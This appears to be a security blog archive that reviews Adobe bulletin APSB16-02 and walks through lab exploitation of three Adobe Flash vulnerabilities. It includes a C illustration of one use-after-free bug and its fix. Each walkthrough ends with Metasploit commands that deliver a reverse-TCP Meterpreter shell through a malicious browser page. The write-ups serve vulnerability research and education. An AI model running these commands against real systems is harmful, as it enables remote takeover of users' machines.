Tag Archives: Adobe

APSB16-02 – Adobe Acrobat and Reader Security Bulletin Review

On January 12th, 2016, during its January Patch Tuesday, Adobe released one Adobe Acrobat and Reader security bulletin addressing 17 vulnerabilities. This security bulletin has a Critical severity rating.

APSB16-02 concerns:

  • Acrobat DC 15.009.20077 and earlier versions on Windows and Macintosh
  • Acrobat Reader DC 15.009.20077 and earlier versions on Windows and Macintosh
  • Acrobat DC 15.006.30097 and earlier versions on Windows and Macintosh
  • Acrobat Reader DC 15.006.30097 and earlier versions on Windows and Macintosh
  • Acrobat XI 11.0.13 and earlier versions on Windows and Macintosh
  • Reader XI 11.0.13 and earlier versions on Windows and Macintosh

CVE-2015-0311 Adobe Flash Player ByteArray UncompressViaZlibVariant Use After Free

Timeline :

Vulnerability discovered exploited in the wild on 2015-01-21
Patched by the vendor on 2015-01-22
Metasploit PoC provided on 2015-03-09

PoC provided by :

Unknown
hdarwin
juan vazquez

Reference(s) :

CVE-2015-0311
APSA15-01

Affected version(s) :

Adobe Flash Player 16.0.0.287 and earlier versions for Windows and Macintosh
Adobe Flash Player 13.0.0.262 and earlier 13.x versions
Adobe Flash Player 11.2.202.438 and earlier versions for Linux

Tested on :

Windows 7 SP1 and Internet Explorer 8 with Adobe Flash Player 16.0.0.287

Description :

This module exploits a use after free vulnerability in Adobe Flash Player. The vulnerability occurs in the ByteArray::UncompressViaZlibVariant method, when trying to uncompress() a malformed byte stream. This module has been tested successfully on:
* Windows 7 SP1 (32-bit), IE 8 to IE 11 and Flash 16.0.0.287, 16.0.0.257 and 16.0.0.235.
* Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 16.0.0.287.
* Windows 8.1, Firefox 38.0.5 and Adobe Flash 16.0.0.305.
* Linux Mint “Rebecca” (32-bit), Firefox 33.0 and Flash 11.2.202.424.

Commands :

use exploit/multi/browser/adobe_flash_uncompress_zlib_uaf
set SRVHOST 192.168.6.138
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
run

getuid

CVE-2015-0359 Adobe Flash Player domainMemory ByteArray Use After Free

Timeline :

Vulnerability discovered by bilou and reported to Chromium VRP
Patched by the vendor on 2015-04-14
Vulnerability discovered integrated into exploit kit on 2015-04-17
PoC provided by unknown and hdarwin on 2015-05-02
Metasploit PoC provided on 2015-05-08

PoC provided by :

bilou
Unknown
hdarwin
juan vazquez

Reference(s) :

CVE-2015-0359
APSB15-06

Affected version(s) :

Adobe Flash Player 17.0.0.134 and earlier versions

Tested on :

Windows 7 SP1 and Internet Explorer 8 with Adobe Flash 17.0.0.134

Description :

This module exploits a use-after-free vulnerability in Adobe Flash Player. The vulnerability occurs when the ByteArray assigned to the current ApplicationDomain is freed from an ActionScript worker, when forcing a reallocation by copying more contents than the original capacity, but Flash forgets to update the domainMemory pointer, leading to a use-after-free situation when the main worker references the domainMemory again. This module has been tested successfully on Windows 7 SP1 (32-bit), IE 8 and IE11 with Flash 17.0.0.134.
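
A minimal C model of the stale-pointer pattern described above, added here as an illustration; it is not Adobe's or Metasploit's code, and every type and function name in it is hypothetical. It shows a cached buffer address going stale when a write larger than the capacity forces a reallocation, next to the fix of refreshing the cache after the reallocation.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
/* Toy model, hypothetical names. The domain caches the buffer address as an
   integer so the model can compare it after the buffer has been freed. */
typedef struct { uint8_t *buf; size_t len, cap; } ByteArray;
typedef struct { ByteArray *ba; uintptr_t domain_memory; } Domain;

/* Grow by allocating the new buffer before freeing the old one, so the
   address is guaranteed to change. Returns 0 on success. */
static int ba_reserve(ByteArray *ba, size_t need) {
    if (need <= ba->cap) return 0;
    uint8_t *nb = malloc(need);
    if (!nb) return -1;
    memcpy(nb, ba->buf, ba->len);
    free(ba->buf);
    ba->buf = nb; ba->cap = need;
    return 0;
}

/* Before: copy more than the capacity; the cached address is not updated. */
static int write_unpatched(Domain *d, const uint8_t *src, size_t n) {
    if (ba_reserve(d->ba, n)) return -1;
    memcpy(d->ba->buf, src, n);
    d->ba->len = n;
    return 0;
}

/* After: same write, then refresh the cached address. */
static int write_patched(Domain *d, const uint8_t *src, size_t n) {
    if (write_unpatched(d, src, n)) return -1;
    d->domain_memory = (uintptr_t)d->ba->buf;
    return 0;
}

/* Returns 1 if the cache is stale after a growing write, 0 if fresh, -1 on error. */
static int stale_after_growth(int patched) {
    uint8_t data[64] = {0};               /* constructed sample input */
    ByteArray ba = { malloc(16), 0, 16 };
    if (!ba.buf) return -1;
    Domain d = { &ba, (uintptr_t)ba.buf };
    int rc = patched ? write_patched(&d, data, sizeof data)
                     : write_unpatched(&d, data, sizeof data);
    int stale = rc ? -1 : d.domain_memory != (uintptr_t)ba.buf;
    free(ba.buf);
    return stale;
}

int main(void) { return !(stale_after_growth(0) == 1 && stale_after_growth(1) == 0); }
```

The model only compares addresses and never reads through the stale one; a consumer that checks or re-resolves the cached address before each use gets the same protection as the patched write path.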

Commands :

use exploit/windows/browser/adobe_flash_domain_memory_uaf
set SRVHOST 192.168.6.138
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
run

getuid

CVE-2014-8440 Adobe Flash Player UncompressViaZlibVariant Uninitialized Memory

Timeline :

Vulnerability discovered by bilou and reported to Verisign’s iDefense VCP
Vulnerability reported to the vendor by Verisign’s iDefense VCP on 2014-09-03
Patched by the vendor via APSB14-24 on 2014-11-11
Vulnerability reported integrated into exploit kits on 2014-11-20
Metasploit PoC provided on 2015-04-30

PoC provided by :

Nicolas Joly (bilou ?)
Unknown
juan vazquez

Reference(s) :

CVE-2014-8440
APSB14-24

Affected version(s) :

Adobe Flash Player 15.0.0.189 and earlier versions
Adobe Flash Player 13.0.0.250 and earlier 13.x versions
Adobe Flash Player 11.2.202.411 and earlier versions for Linux
Adobe AIR desktop runtime 15.0.0.293 and earlier versions
Adobe AIR SDK 15.0.0.302 and earlier versions
Adobe AIR SDK & Compiler 15.0.0.302 and earlier versions
Adobe AIR 15.0.0.293 and earlier versions for Android

Tested on :

Windows 7 SP1 and Internet Explorer 11 with Adobe Flash Player 15.0.0.189

Description :

This module exploits an uninitialized memory vulnerability in Adobe Flash Player. The vulnerability occurs in the ByteArray::UncompressViaZlibVariant method, which fails to initialize allocated memory. When using a correct memory layout this vulnerability leads to a ByteArray object corruption, which can be abused to access and corrupt memory. This module has been tested successfully on Windows 7 SP1 (32-bit), IE 8 and IE11 with Flash 15.0.0.189.

Commands :

use exploit/windows/browser/adobe_flash_uncompress_zlib_uninitialized
set SRVHOST 192.168.6.138
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
run

getuid
sysinfo